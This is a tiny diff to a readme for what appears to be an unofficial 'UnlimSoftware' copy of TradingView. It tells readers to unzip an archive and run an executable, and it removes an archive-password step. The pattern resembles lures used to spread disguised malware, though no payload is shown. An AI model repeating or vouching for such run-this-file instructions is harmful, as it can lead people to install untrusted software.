UnlimSoftware/TradingView/Readme.txt

 MANUAL:
 1) Unzip all files from archive TradingView
-2) Password: 1234
-3) Go to folder TradingView
+2) Go to folder TradingView
-4) Run file: setup.exe
+3) Run file: TradingView.exe